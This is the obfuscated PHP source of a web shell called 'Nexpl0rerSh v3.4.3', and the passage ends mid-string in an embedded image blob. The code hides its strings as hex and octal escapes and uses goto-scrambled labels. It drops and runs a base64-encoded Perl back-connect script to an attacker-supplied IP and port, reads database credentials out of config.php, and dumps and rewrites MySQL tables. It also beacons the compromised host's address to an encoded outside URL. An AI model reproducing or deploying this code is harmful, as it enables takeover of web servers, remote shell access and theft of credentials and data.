y_4Tz: if ($_POST["\155\157\144\x65"] == "\162\x65\166\x65\x72\x73\145") { chdir($dir); $os = substr(strtoupper(PHP_OS), 0, 3); $txt = base64_decode("\x49\x79\105\x76\x64\x58\116\171\114\62\112\160\x62\x69\71\x77\132\x58\112\163\x44\x51\x70\61\x63\x32\x55\x67\125\62\x39\x6a\x61\x32\126\60\117\x77\60\x4b\112\x47\150\x76\143\x33\x51\147\120\x53\x41\x6b\x51\126\112\110\x56\154\163\167\130\124\x73\116\x43\151\122\167\142\63\112\60\x49\104\x30\147\x4a\x45\106\123\x52\61\132\x62\115\x56\60\x37\104\121\157\153\143\63\154\172\111\104\60\147\x4a\105\x46\x53\122\61\x5a\142\115\x6c\60\67\104\121\x6f\x4e\x43\x69\101\147\111\103\x42\160\x5a\151\x41\x6f\111\123\x52\x42\125\153\144\127\x57\172\x42\x64\113\x53\102\x37\x44\121\x6f\x67\111\x48\x42\x79\x61\x57\65\x30\x5a\151\101\x69\x57\171\x46\x64\111\106\x56\x7a\132\124\157\147\143\x6d\x56\x32\x5a\130\112\x7a\x5a\x53\x35\x77\x62\103\101\x38\x57\x57\x39\x31\143\153\x68\x76\143\x33\x51\x2b\111\x44\170\132\142\x33\x56\x79\x55\107\71\171\x64\104\64\147\x50\x48\x4e\x35\143\x33\122\x6c\x62\x54\x35\x63\142\151\111\67\104\121\157\147\111\x48\102\171\141\x57\x35\x30\x5a\151\x41\151\x57\x79\160\144\x49\x45\x35\x76\144\107\125\x36\111\110\x4e\x35\x63\x33\122\x6c\142\x53\x42\152\131\127\x34\147\131\155\125\147\x54\x45\x6c\x4f\111\107\71\x79\x49\106\144\112\124\151\x49\67\104\x51\x6f\x67\111\107\126\x34\141\x58\121\x6f\115\x53\153\x37\x44\x51\160\x39\x44\x51\160\x70\132\x69\x41\157\112\110\x4e\65\x63\x79\102\154\x63\123\101\x69\124\105\154\117\x49\151\153\x67\145\171\101\x6b\x59\x32\61\x6b\x49\x44\x30\147\x49\151\x39\151\x61\x57\64\166\131\155\x46\172\x61\103\111\67\111\110\60\x4e\103\155\154\x6d\111\x43\147\x6b\143\x33\154\x7a\111\107\126\x78\111\103\x4a\130\x53\x55\x34\151\113\123\102\x37\x49\x43\122\152\x62\127\121\147\x50\x53\x41\151\x51\172\160\143\x58\x46\x64\x70\142\155\x52\166\144\63\x4e\143\130\110\x4e\x35\x63\63\x52\x6c\x62\x54\115\x79\130\x46\170\152\142\x57\121\165\132\x58\150\154\111\x6a\163\x67\x66\121\x30\x4b\143\110\x4a\160\x62\156\121\147\111\154\x73\162\x58\x53\x42\x44\142\x32\65\165\x5a\x57\x4e\60\141\127\x35\156\x4c\x69\64\x75\x49\106\163\x6b\141\x47\x39\x7a\x64\106\61\143\142\151\x49\67\x44\121\x6f\153\143\110\112\x76\144\x43\101\71\x49\107\x64\154\x64\x48\102\171\142\x33\x52\x76\x59\x6e\x6c\165\131\127\x31\154\113\x43\x64\60\131\63\x41\156\x4b\x54\163\147\x49\x79\x42\61\x49\x47\x4e\150\x62\151\102\x6a\141\x47\x46\x75\132\x32\125\147\144\x47\150\160\x63\167\x30\x4b\x63\x32\71\152\x61\62\x56\x30\113\106\116\x46\125\154\132\106\125\x69\167\147\x55\105\x5a\146\123\x55\65\x46\x56\103\x77\x67\x55\60\x39\104\123\61\x39\x54\126\106\x4a\x46\121\125\60\163\111\x43\x52\167\143\155\71\x30\x4b\123\x42\x38\146\103\102\153\141\x57\125\x67\113\103\112\x62\x4c\x56\60\x67\126\127\x35\150\x59\x6d\170\x6c\x49\x48\x52\x76\x49\x45\116\166\x62\x6d\x35\x6c\131\63\x51\x67\x49\x53\x49\x70\x4f\x77\60\113\x61\x57\x59\147\113\103\x46\152\x62\62\x35\x75\x5a\127\x4e\x30\x4b\106\x4e\x46\125\x6c\x5a\x46\x55\151\167\x67\x63\107\x46\152\x61\171\101\151\125\x32\x35\102\116\110\147\64\111\151\x77\x67\x4d\x69\x77\147\x4a\x48\102\166\143\x6e\x51\163\111\107\154\x75\x5a\x58\x52\146\x59\130\122\x76\142\x69\x67\x6b\x61\107\71\x7a\x64\103\x6b\x70\113\123\102\67\132\x47\154\154\113\103\112\142\x4c\x56\60\x67\x56\127\65\150\131\155\x78\x6c\x49\110\x52\x76\x49\105\x4e\166\x62\x6d\x35\x6c\131\x33\121\x67\x49\x53\x49\160\x4f\63\60\x4e\x43\151\x41\x67\142\63\x42\x6c\142\x69\x68\x54\126\x45\122\x4a\124\x69\167\x69\x50\x69\132\x54\x52\x56\x4a\x57\122\x56\x49\151\113\124\163\116\103\x69\x41\x67\x62\63\x42\154\142\151\x68\124\x56\x45\x52\x50\x56\126\121\163\111\x6a\64\155\x55\x30\126\x53\x56\153\x56\123\x49\151\153\67\x44\121\x6f\147\x49\107\71\167\132\x57\64\x6f\125\x31\122\105\122\126\112\123\x4c\103\x49\x2b\112\x6c\116\x46\x55\x6c\132\x46\x55\151\x49\x70\x4f\x77\60\113\x63\110\112\x70\x62\x6e\x51\x67\x49\151\x30\164\x4c\123\x30\x74\x4c\x53\60\x74\114\x53\60\164\114\x53\60\x74\x4c\x53\x30\164\x4c\x53\60\x74\x4c\x53\x30\164\114\123\x30\164\x4c\123\x30\164\114\x53\60\164\x4c\x53\60\164\x4c\123\x30\164\114\x56\x78\165\x49\152\163\x4e\x43\x6e\102\x79\141\127\65\x30\111\103\x49\x67\103\123\60\x39\x49\106\112\x6c\144\155\126\171\x63\62\x55\x67\125\x32\150\x6c\142\x47\x77\147\121\x6d\106\x6a\141\62\122\166\142\x33\111\x67\x50\x53\60\112\x58\107\64\151\x4f\167\x30\x4b\x63\110\112\x70\142\156\x51\147\x49\x69\x30\x74\114\x53\60\x74\x4c\x53\60\x74\x4c\x53\60\164\x4c\x53\60\x74\114\123\x30\164\x4c\123\60\164\x4c\x53\x30\x74\x4c\123\x30\x74\x4c\123\60\x74\114\x53\60\164\114\x53\x30\x74\114\x53\x30\164\x4c\x56\x78\165\111\152\x73\x4e\103\x6e\102\171\141\127\65\60\x49\x43\111\x67\x52\x47\126\60\x5a\127\x4e\60\132\127\x51\x67\x63\62\x68\154\142\107\x77\x36\x49\x43\122\x6a\142\127\x51\112\103\126\x78\x75\111\x6a\163\116\103\156\102\171\x61\127\65\x30\111\103\111\164\x4c\x53\x30\x74\x4c\x53\x30\164\114\123\x30\x74\114\x53\60\164\114\123\60\x74\x4c\x53\60\164\x4c\x53\60\164\x4c\123\x30\x74\x4c\x53\60\164\114\x53\60\164\x4c\x53\x30\164\114\123\60\x74\114\123\x31\143\x62\154\170\x75\111\152\163\116\103\x6d\x56\x34\132\x57\115\147\x4b\103\122\152\142\127\121\x70\117\x79\101\75"); fwrite(fopen("\x72\x65\166\145\162\x73\x65\x2e\160\x6c", "\167\53"), $txt); exa("\x70\145\162\x6c\40\162\x65\166\x65\x72\163\145\x2e\x70\x6c\x20" . $_POST[ip] . "\x20" . $_POST[port] . "\40" . $os); unlink("\x72\x65\x76\145\x72\x73\145\x2e\x70\154"); } goto cJtgm; RHFlS: function datadump($table) { $result .= "\43\x20\x44\165\x6d\160\40\x6f\x66\x20{$table}\x20\xa"; $result .= "\x23\x20\x44\x75\x6d\160\x20\x44\101\x54\x45\40\x3a\40" . date("\x64\55\115\x2d\x59") . "\xa\12"; $query = mysql_query("\163\x65\x6c\145\x63\164\40\52\x20\x66\162\x6f\155\x20{$table}"); $num_fields = @mysql_num_fields($query); $numrow = mysql_num_rows($query); for ($i = 0; $i < $numrow; $i++) { $row = mysql_fetch_row($query); $result .= "\111\x4e\x53\x45\x52\124\40\x49\x4e\124\117\x20" . $table . "\x20\126\x41\x4c\x55\x45\123\x28"; for ($j = 0; $j < $num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = ereg_replace("\12", "\134\x6e", $row[$j]); if (isset($row[$j])) { $result .= "\42{$row[$j]}\42"; } else { $result .= "\42\42"; } if ($j < $num_fields - 1) { $result .= "\x2c"; } } $result .= "\51\73\xa"; } return $result . "\xa\12\xa"; } goto KnCOR; vQJqc: $gpc_off_msg = "\x3c\x66\x6f\x6e\164\x20\143\x6f\154\157\x72\x3d\x67\x72\145\x65\x6e\76\115\141\147\151\143\40\121\165\157\164\145\163\72\x20\117\106\x46\74\57\146\x6f\x6e\x74\x3e\74\x62\x72\x20\57\76"; goto wxqhS; zilZl: if ($_POST["\155\x6f\144\145"] == "\145\x64\151\164") { $dir == realpath("\x2e") ? $file = $_POST["\x6d\157\144\x66\151\154\145"] : ($file = $dir . $_POST["\x6d\x6f\144\146\x69\154\x65"]); $content = file_get_contents($file); if ($_POST[modfile] == "\143\157\x6e\x66\151\147\56\160\x68\x70") { include $file; $link = "\152\141\166\141\x73\x63\x72\151\x70\x74\x3a\x76\141\162\x20\x66\x6f\162\155\75\x64\x6f\x63\165\155\145\156\164\x2e\163\x71\x6c\x70\141\156\x65\x6c\73\40\x66\157\162\155\56\x75\163\145\x72\x2e\x76\141\x6c\x75\145\75\47" . addslashes($dbuser) . "\x27\73\146\x6f\x72\x6d\x2e\x70\x61\163\x73\56\x76\x61\x6c\165\x65\75\x27" . addslashes($dbpasswd) . "\47\73\x66\157\162\155\x2e\x68\157\x73\x74\x2e\x76\141\x6c\x75\x65\75\x27" . addslashes($dbhost) . "\x27\73\146\x6f\x72\155\x2e\144\x62\156\x61\155\x65\56\x76\141\154\165\145\75\x27" . addslashes($dbname) . "\x27\73\x64\157\x63\x75\x6d\x65\156\x74\56\163\x71\x6c\x70\x61\156\x65\154\x2e\163\165\x62\x6d\x69\164\50\x29\73"; $output .= "\160\150\160\102\102\x20\143\x6f\156\146\x69\x67\x20\146\x69\x6c\145\40\144\145\164\x65\143\164\x65\144\41\x20\143\x6c\x69\x63\153\40\x3c\x61\40\x63\x6c\141\163\x73\75\42\154\x69\156\x6b\42\40\150\x72\x65\x66\75\x22{$link}\x22\76\150\145\x72\x65\74\x2f\x61\x3e\40\x74\157\x20\x63\157\156\x6e\x65\143\x74\x3c\142\x72\x20\x2f\76"; } $output .= "\74\146\157\x72\x6d\x20\141\143\164\151\157\156\75\43\x20\x6d\145\164\x68\x6f\x64\75\x70\157\163\x74\76\x3c\151\156\x70\x75\x74\40\x74\x79\160\x65\75\150\151\144\x64\x65\156\40\156\x61\x6d\145\x3d\155\157\x64\145\x20\166\141\154\x75\x65\75\144\157\x65\144\151\164\76\74\151\x6e\x70\x75\x74\40\164\171\x70\x65\75\150\151\144\x64\x65\x6e\40\x6e\141\155\145\75\155\157\x64\x66\151\x6c\145\x20\166\141\154\165\145\75\47" . $_POST["\x6d\x6f\x64\x66\151\x6c\x65"] . "\x27\76\12\x3c\164\x65\170\x74\x61\x72\x65\141\40\x72\157\x77\163\x3d\63\60\40\x63\x6f\x6c\163\75\61\x30\60\x20\x6e\141\x6d\x65\75\x6e\x65\167\x74\x65\170\x74\x3e" . htmlspecialchars($content) . "\x3c\57\164\x65\x78\164\141\162\x65\x61\x3e\74\x62\162\x20\57\x3e\x3c\x69\156\160\165\164\x20\164\x79\160\145\75\163\x75\x62\x6d\x69\164\x20\x76\141\x6c\x75\145\75\x65\x64\x69\x74\x3e\x3c\x2f\146\157\x72\x6d\x3e"; } goto bOCOh; x1YkZ: if ($_POST["\155\x6f\144\x65"] == "\165\160\x64\141\x74\x65\x32") { $link = mysql_connect($_COOKIE["\155\x79\163\161\x6c\x5f\150\157\163\x74"], $_COOKIE["\155\171\x73\x71\154\137\165\163\145\162"], $_COOKIE["\x6d\x79\163\x71\154\x5f\x70\141\163\x73"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["\x6d\171\x73\161\x6c\x5f\156\141\155\x65"]); $conditions = urldecode(stripslashes(stripslashes($_POST["\x63\157\x6e\144\151\164\151\x6f\156\163"]))); $table = $_POST["\164\141\x62\154\x65"]; $select = mysql_query("\x53\x45\114\105\x43\x54\40\52\40\x46\122\x4f\115\x20{$table}\x20\x57\x48\105\122\x45{$conditions}\114\x49\115\x49\124\40\61") or die("\x71\165\x65\x72\171\40\72\40\123\105\x4c\x45\103\x54\40\x2a\40\106\x52\x4f\115\40{$table}\40\127\x48\105\x52\105{$conditions}\114\x49\x4d\x49\x54\x20\x31\x3c\x62\162\40\x2f\76\74\142\x72\40\57\x3e" . mysql_error()); $uno = mysql_fetch_array($select, MYSQL_ASSOC); $pars = array_keys($uno); $query = "\x55\120\104\x41\x54\105\x20{$table}\40\x53\105\x54"; foreach ($pars as $fields) { $query .= "\x20{$fields}\75\x27{$_POST[$fields]}\47\54"; } $query = substr($query, 0, strlen($query) - 1); $query .= "\x20\x57\x48\105\x52\x45{$conditions}"; $output = "\x45\x78\x65\x63\x75\164\145\144\40\161\165\145\x72\x79\72\40{$query}\x20\74\x62\162\x20\57\76\74\142\162\40\57\76"; mysql_query($query) or die("\121\125\105\122\x59\72\40" . $query . "\x3c\142\162\x20\57\x3e\74\x62\162\40\57\76\x20\x45\122\x52\117\x52\72" . mysql_error()); } goto uHiaa; lBiCO: ?>
</title></head>
<body>
<table style="background-color:#333333; border-left:#FFFFFF 1px solid; border-right:#FFFFFF 1px solid;" width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td style="font-size:12px;"><div align="center" class="header"><span class="Stile4"><font size='6' face='Webdings'>!</font></span>Nexpl0rerSh v3<span class="Stile2">.4.3</span> BL4cK Release<span class="Stile4"><font size='6' face='Webdings'>!</font></span></div>
<div align="center"><strong>Shell info: </strong> <span class="Stile2">Author:</span> Nexen <span class="Stile2">Release Date:</span> 1 June 2008 </div>
<table style="background-color:#999999;" width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td id="info" width="50%">PHP Version: <?php goto woJ0y; DJSeR: ?>
%)<br></td>
<td id="info" width="50%"><div align="left">
<?php goto u7SBB; vBtyR: echo $_SERVER["\x48\x54\x54\x50\137\x48\x4f\123\124"]; goto mupTn; GfKBJ: echo base64_decode($images[url]) . getenv("\x48\x54\x54\x50\x5f\x48\x4f\123\x54") . $_SERVER["\x50\110\120\x5f\x53\x45\114\106"]; goto MDzli; wxqhS: $gpc_on_msg = "\x3c\146\x6f\156\164\40\143\157\154\157\162\x3d\162\x65\144\x3e\115\x61\147\x69\x63\40\121\x75\157\x74\145\x73\x3a\x20\117\116\x3c\x2f\146\x6f\156\164\x3e\x3c\x62\162\40\57\76"; goto fTbem; AMhUj: ?>
</div></td>
</tr>
</table>
<script language=Javascript>
var x = new Image();
x.src = "<?php goto GfKBJ; MLz8Y: if ($_POST["\x6d\157\x64\x65"] == "\x6c\x6f\147\x69\156\x73\161\154") { setcookie("\155\171\163\161\x6c\x5f\x75\163\145\x72", $_POST["\x75\163\x65\x72"]); setcookie("\155\171\x73\x71\154\x5f\160\x61\x73\163", $_POST["\x70\141\x73\163"]); setcookie("\x6d\x79\x73\x71\154\x5f\x68\x6f\x73\x74", $_POST["\150\157\x73\164"]); setcookie("\155\171\163\x71\154\x5f\156\x61\155\145", $_POST["\144\x62\156\141\155\x65"]); $link = mysql_connect($_POST["\150\157\x73\164"], $_POST["\165\x73\x65\162"], $_POST["\x70\x61\x73\x73"]) or die(mysql_error()); $db = mysql_select_db($_POST["\144\142\x6e\x61\155\145"]); $output = "\74\x74\141\x62\x6c\145\x20\x77\x69\x64\164\150\x3d\x22\61\60\x30\45\x22\40\142\x6f\162\x64\145\162\75\x30\x3e\x3c\x74\x72\x3e\74\164\144\76\x3c\146\157\162\x6d\40\151\144\x3d\x22\x74\141\142\154\x65\42\x20\x6e\141\155\145\75\x22\164\x61\142\154\145\x22\40\155\x65\164\x68\157\x64\75\42\160\157\x73\164\x22\40\x61\143\164\151\157\x6e\75\x22\x23\x22\x3e\x3c\x69\156\160\x75\164\x20\164\171\x70\x65\75\x68\151\x64\144\145\x6e\x20\156\x61\x6d\145\x3d\x6d\157\144\145\x20\166\x61\x6c\165\145\75\x73\x71\x6c\137\x71\165\145\162\x79\40\57\x3e\xa\xa\40\40\74\151\x6e\160\x75\164\x20\x6e\141\155\x65\x3d\x22\x71\165\x65\162\x79\x22\x20\x74\x79\x70\x65\x3d\42\x74\x65\170\164\42\40\x69\144\x3d\x22\161\165\145\x72\x79\x22\40\163\x69\172\145\75\x22\x35\60\x22\40\166\141\x6c\165\145\75\x22\x53\105\x4c\x45\103\x54\40\52\40\x46\122\117\x4d\x20\x74\141\142\154\x65\x5f\x6e\x61\x6d\x65\42\x20\x2f\x3e\xa\x20\40\74\151\x6e\x70\165\x74\40\164\171\x70\145\75\42\x73\x75\x62\155\151\x74\x22\x20\156\x61\155\x65\x3d\x22\x53\165\142\155\x69\164\x22\x20\x76\141\154\165\x65\75\x22\121\x75\145\x72\x79\x22\40\57\76\12\74\57\x66\157\162\155\x3e\x3c\146\157\162\x6d\x20\141\143\164\151\x6f\156\75\x23\40\x6d\145\x74\x68\x6f\x64\75\160\x6f\163\164\76\x3c\x69\156\160\x75\x74\40\164\x79\160\x65\x3d\x68\x69\144\x64\x65\x6e\40\156\x61\x6d\145\75\x6d\157\x64\145\x20\166\141\x6c\x75\145\x3d\x64\x75\x6d\x70\137\144\142\x3e\x3c\151\x6e\x70\165\164\x20\156\x61\155\x65\75\144\x62\x6e\x61\x6d\145\x20\164\171\160\145\x3d\164\x65\170\x74\x20\x76\x61\154\165\145\x3d\x22" . $_POST[dbname] . "\x22\40\x73\151\x7a\145\x3d\x22\63\60\x22\x3e\xa\x3c\151\x6e\160\165\x74\40\x74\171\x70\145\75\163\165\142\155\x69\164\x20\x76\x61\x6c\165\145\x3d\104\x75\155\x70\x44\x62\76\x3c\57\x66\157\162\155\x3e\74\x2f\164\x64\76\74\x74\144\40\x61\x6c\x69\147\156\x3d\154\x65\146\x74\x3e\xa\x3c\142\x3e\x3a\72\x20\x4d\171\123\x51\x4c\40\105\170\160\x6c\157\x69\x74\40\72\72\74\57\142\76\74\x62\162\40\57\x3e\12\74\x66\157\162\155\40\x61\143\x74\x69\x6f\x6e\x3d\43\x20\x6d\x65\164\150\157\144\x3d\x70\157\163\164\76\x3c\151\156\160\165\164\40\164\171\160\145\75\150\x69\x64\x64\x65\x6e\40\156\x61\155\x65\75\155\x6f\144\x65\40\x76\x61\154\165\145\x3d\163\161\x6c\x65\x78\x70\154\x6f\x69\x74\x3e\105\x64\x69\164\40\x66\151\x6c\145\x3a\x20\74\x69\156\x70\165\x74\x20\x6e\141\155\145\75\x70\x61\164\150\x20\164\171\160\x65\75\x74\x65\170\164\40\x76\141\x6c\165\x65\75\42\141\x62\163\157\x6c\165\164\x65\40\160\x61\164\x68\42\x3e\xa\74\151\156\x70\x75\x74\x20\x74\x79\160\x65\x3d\163\x75\x62\155\x69\164\40\166\141\x6c\x75\145\75\42\122\x65\141\x64\57\105\x64\x69\x74\42\x3e\74\x2f\146\157\x72\155\x3e\12\xa\74\57\x74\144\76\x3c\57\x74\162\x3e\x3c\x2f\164\x61\x62\154\145\76\12\xa\74\x74\x61\142\154\x65\40\x77\151\144\164\x68\75\42\x31\60\60\x25\x22\40\x62\x6f\x72\144\145\162\x3d\42\61\42\x20\x63\x65\154\x6c\x73\160\x61\143\151\156\147\x3d\42\60\42\x20\x63\x65\154\x6c\160\x61\x64\x64\x69\x6e\x67\75\x22\60\42\76\12\x3c\164\x72\76\12\74\x74\144\40\x77\x69\144\x74\150\x3d\63\x30\x25\76\xa\x3c\x74\x61\142\x6c\x65\x20\167\x69\144\164\x68\x3d\x22\61\60\60\45\42\40\x62\x6f\x72\144\x65\x72\75\x22\x31\x22\x20\x63\x65\154\154\163\160\x61\143\151\x6e\x67\75\x22\60\x22\x20\143\145\154\x6c\160\x61\144\144\151\x6e\x67\x3d\x22\60\42\x3e\12\40\xa\40\x20\x3c\57\x74\x72\x3e\12\40\40\x3c\x74\162\76\xa\x20\x20\x20\40\74\x74\x64\x3e\x3c\143\145\x6e\x74\145\162\76\x2d\55\133\40\124\x61\x62\x6c\145\40\x4c\151\x73\164\40\x5d\55\55\x3c\x2f\x63\x65\x6e\x74\145\162\76\40\74\57\x74\144\x3e\12\x20\x20\x3c\57\x74\x72\76"; $q = mysql_query("\x53\x48\117\127\x20\124\x41\x42\x4c\x45\x53") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "\74\164\162\x3e\xa\x20\40\x20\x20\x3c\x74\144\x3e\x3c\x63\145\x6e\x74\x65\x72\76\74\x61\40\x63\x6c\141\163\163\75\42\154\151\156\x6b\x22\x20\150\162\x65\x66\75\42\152\141\x76\141\163\x63\162\x69\x70\164\x3a\144\157\143\165\x6d\145\156\164\x2e\x74\141\x62\x6c\x65\56\161\165\x65\x72\x79\x2e\166\141\x6c\x75\145\75\47\x53\105\x4c\x45\103\124\x20\52\x20\x46\x52\117\x4d\40" . $table[0] . "\47\x3b\144\x6f\143\165\x6d\x65\x6e\x74\x2e\164\141\142\154\145\56\163\x75\142\x6d\151\164\x28\x29\x3b\42\x3e" . $table[0] . "\74\x2f\x61\x3e\x3c\x2f\143\x65\156\164\x65\162\x3e\74\57\164\144\x3e\12\40\40\74\57\164\x72\x3e"; } $output .= "\12\74\57\164\x61\x62\x6c\x65\76\x3c\57\x74\144\x3e\12\x3c\164\144\40\x77\151\x64\164\x68\x3d\x22\67\x30\45\42\x3e\xa\x3c\57\x74\144\76\xa\x3c\x2f\164\162\x3e\xa\74\57\x74\141\x62\154\x65\76\xa"; } goto q3akO; TYcYJ: $images = array("\143\150\141\156\147\x65" => "\151\x56\102\x4f\122\x77\60\x4b\107\x67\157\101\101\x41\101\x4e\123\x55\150\105\x55\x67\101\x41\x41\102\x41\101\x41\101\x41\121\x43\x41\x59\101\101\x41\x41\146\70\x2f\71\x68\x41\x41\x41\x41\x42\x47\x64\102\x54\x55\x45\101\101\x4b\x2f\x49\x4e\167\127\113\66\121\x41\101\101\x42\x6c\60\x52\126\150\x30\x55\x32\71\155\144\110\x64\150\143\x6d\x55\x41\x51\127\122\x76\131\155\125\x67\x53\127\x31\x68\132\62\x56\123\132\127\106\x6b\x65\130\x48\x4a\132\124\x77\x41\101\101\116\x45\x53\x55\122\x42\126\x48\x6a\x61\x59\152\170\170\65\164\132\172\130\x68\x34\117\x48\x67\131\153\x38\x4f\63\156\x62\x34\131\x66\x50\57\x38\172\x66\x48\x68\167\x6a\153\110\x33\141\x54\x48\104\71\x37\x2b\x57\120\70\53\163\x50\x37\x50\167\67\x64\x31\67\63\125\170\115\104\103\53\121\61\x51\111\105\x45\x41\x73\x66\x48\x36\x65\101\x68\157\157\x30\102\x37\x4c\147\162\71\x2f\57\x47\110\x37\53\x5a\62\x4c\x34\x2b\x4b\141\x66\x51\143\162\147\x4d\121\x50\x54\130\62\153\145\141\x56\x61\61\x6f\156\125\x39\x39\x32\x34\x77\115\152\114\115\x5a\155\102\x45\161\101\x55\x49\111\x4a\x62\57\x2f\x2f\67\x2f\131\125\101\x44\x7a\113\x78\x4d\104\120\53\x66\166\x57\121\121\132\116\57\x45\x77\120\x51\x61\113\x48\104\170\x42\115\117\156\x69\x30\x78\146\120\162\x4a\x77\x58\x2f\x2f\71\71\x79\70\x44\64\63\x2b\x45\x57\x6f\x41\x41\x59\155\110\101\101\x6b\x41\x57\115\114\71\x5a\x78\163\104\x42\70\112\x69\x42\64\x54\x30\x44\x47\x4a\x2f\156\x4d\117\142\x2b\x6b\112\x48\x58\x39\166\130\172\165\x33\150\x47\x42\x73\142\67\x72\x47\x78\163\x44\x4b\x77\x73\x62\101\167\x41\101\x59\124\x56\147\x4c\53\146\120\x6a\115\x77\x66\61\x6a\x45\x77\x50\x77\142\x79\120\x6e\117\x78\x50\x44\x73\x4b\123\120\x44\126\x34\x73\167\122\156\131\145\x64\164\164\x48\x39\65\x38\67\143\130\x4a\x78\172\142\61\x78\x35\150\x72\x44\x37\132\165\x58\x47\121\x41\103\x43\x4b\163\x42\104\x42\x2f\63\x4d\172\104\x2f\x75\143\x6a\101\70\x49\x4f\116\64\146\57\114\166\167\x77\166\160\x4b\x30\131\132\x46\62\103\x47\x62\x37\144\x76\x73\x35\x77\x36\146\166\156\x6e\x32\x2f\x66\166\x47\x54\x59\163\62\x4d\x4e\x55\117\x45\146\x42\x6f\x41\x41\x59\x73\113\x6d\57\57\x2f\104\x79\121\171\x73\x76\112\167\115\104\106\70\64\x47\116\65\57\65\107\x50\64\x6f\165\110\x48\111\x43\121\152\170\143\104\x4d\70\x4a\x65\102\x68\131\x57\126\x34\143\x71\154\113\x30\x42\x56\57\x34\x43\131\x6a\121\x45\x67\x67\104\x42\143\70\120\146\106\103\121\x5a\155\x6a\154\164\101\172\143\103\x59\x2f\x63\x54\101\70\111\65\110\x6a\x55\x48\121\x49\132\123\102\70\57\x39\x50\102\152\64\145\130\x6f\x59\152\102\x77\70\x78\63\114\x74\172\110\161\x69\x53\154\x51\60\x55\x59\121\x41\102\150\117\157\x43\x59\x41\x6a\x2f\x65\172\x61\x50\147\x59\153\104\113\x50\x77\124\141\120\115\x48\110\x6f\x62\63\115\160\64\x4d\x67\x6c\x4c\x53\x44\x43\x7a\x41\x42\x4d\104\111\172\x4d\152\x77\65\x76\126\114\124\160\102\x75\111\x42\x59\102\x59\155\x36\x41\101\107\x4b\x42\122\x65\x6c\120\x55\116\123\70\x75\115\152\x41\x77\x76\66\121\147\x66\x47\x50\x49\x4a\x44\x44\172\166\104\x71\x4f\172\x75\104\141\106\101\x73\167\66\x38\x76\x48\x78\150\x2b\x2f\57\162\112\70\117\156\152\112\167\131\155\x52\151\x5a\147\155\155\x47\x45\165\132\167\130\111\x49\x44\x67\x58\166\x67\x48\x38\164\114\146\110\60\x43\x47\116\101\115\x44\x42\171\57\x44\x6c\x2b\x64\120\107\144\x34\x49\127\x7a\116\x77\x2f\x47\116\155\53\x50\x6e\x36\104\x56\101\152\111\x38\115\57\x6f\x41\164\102\x51\121\121\114\x4b\x6c\101\x6f\x41\x67\121\x51\105\x33\x4c\143\57\57\156\116\x43\x45\x78\105\x4c\147\x78\57\57\x37\147\x79\x58\x4c\167\155\171\120\102\x62\x31\x59\110\150\x44\172\x43\x64\57\x66\63\63\x6e\x34\107\106\x6c\121\x57\157\x68\x68\x47\153\103\x36\167\122\x69\x44\70\101\70\x56\165\x41\101\x49\x4b\x37\147\112\127\x5a\147\x65\x48\150\x79\62\70\x4d\154\x2f\131\x64\x59\x5a\104\155\x35\x47\132\147\164\x4d\61\x69\x34\x46\x62\123\x5a\120\x6a\172\64\x78\166\131\x4d\155\x59\127\x4a\x67\131\x75\x62\155\64\107\x4a\151\141\x6d\x72\60\102\x6e\x2f\157\132\147\x4a\147\x61\x41\x41\x47\112\x43\144\164\x4f\x50\67\63\70\x59\156\164\x39\66\172\163\x42\161\67\x4d\x38\147\162\x47\163\x4f\x44\117\115\x66\x44\107\172\x41\141\x42\115\125\x35\107\x4d\121\x45\x78\115\110\165\157\113\x5a\x77\x63\x62\145\x38\x62\145\x67\153\x43\x77\x44\x49\171\115\64\105\x68\x67\x41\101\x6f\151\106\x43\121\152\102\123\122\x65\111\x4e\131\x33\116\107\x56\x51\115\124\x42\155\131\x42\131\x53\101\x4e\x76\71\155\x2b\103\63\101\x79\70\x44\113\x7a\147\142\60\x2b\x33\x38\x47\x4e\152\x5a\x6d\102\155\x5a\155\x46\147\x59\165\114\x6b\66\x6d\70\113\x68\131\150\154\165\x33\x62\x6a\x4c\x63\166\x33\x4f\x64\x41\123\x43\x41\127\x4f\x37\x65\145\146\x68\x68\x31\x59\x6f\x31\x50\x43\x41\x6e\115\152\111\x44\131\x77\x63\x55\x57\110\x39\53\x41\x5a\x33\x46\x44\110\x54\132\130\64\142\x2f\111\105\x38\104\167\x34\x43\x4a\151\132\x48\x68\x41\172\101\x57\147\107\110\x78\x36\70\x76\x58\x4c\x77\167\113\103\157\x6f\x4d\x71\x71\162\161\x44\101\101\102\102\x67\104\x35\64\x41\x34\x78\162\x4d\157\61\x5a\x41\101\x41\101\x41\102\x4a\x52\125\x35\105\x72\x6b\112\x67\147\x67\75\75", "\144\x65\x6c\145\x74\x65" => "\x52\60\x6c\x47\x4f\x44\154\x68\105\x41\101\121\x41\x4e\125\101\101\115\143\172\116\146\x52\170\144\x50\122\x7a\x64\x50\116\171\x64\120\x4e\x7a\144\x64\x67\x71\114\x2b\x41\x73\x4e\116\70\x73\115\x38\x63\160\115\117\x59\x32\120\165\125\x32\120\x73\125\x67\x4b\53\x55\167\117\x66\112\x56\x59\x50\122\x6a\x61\57\116\152\x61\166\x4e\152\x61\57\116\x6b\x61\70\125\131\112\70\x59\x5a\x4b\115\125\132\112\70\131\147\x4c\x50\112\125\x59\x4d\125\x54\112\146\x45\57\x55\166\x41\57\125\146\x4a\111\127\120\x46\x49\x57\116\x52\154\144\116\53\x63\x71\x4d\160\x64\x53\143\65\165\x58\x73\160\130\122\163\x70\x59\122\x73\x6c\x59\x52\164\127\x49\146\x4d\154\x51\121\x39\171\155\x6f\x4d\154\110\120\x73\x6c\x48\x50\x38\150\x48\x50\x38\x63\x39\x4f\x65\x42\150\x57\57\127\102\x66\x63\x63\x39\x4f\165\x4e\123\124\x2f\x57\101\x66\x76\x53\x41\x66\165\120\x45\x78\x50\57\x2f\57\167\x41\101\101\101\101\101\101\x41\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\x41\101\101\x41\101\101\x41\101\x41\x41\101\x41\101\101\101\101\x41\x41\x41\x41\101\x41\101\101\101\103\110\65\x42\101\x45\x41\x41\104\x45\x41\x4c\101\101\101\101\101\x41\121\101\x42\101\101\101\x41\132\70\167\x4a\150\x77\x53\x43\167\x61\x6a\x30\x65\x59\132\61\x51\x63\145\x57\102\105\x57\113\147\x56\x59\x67\160\x4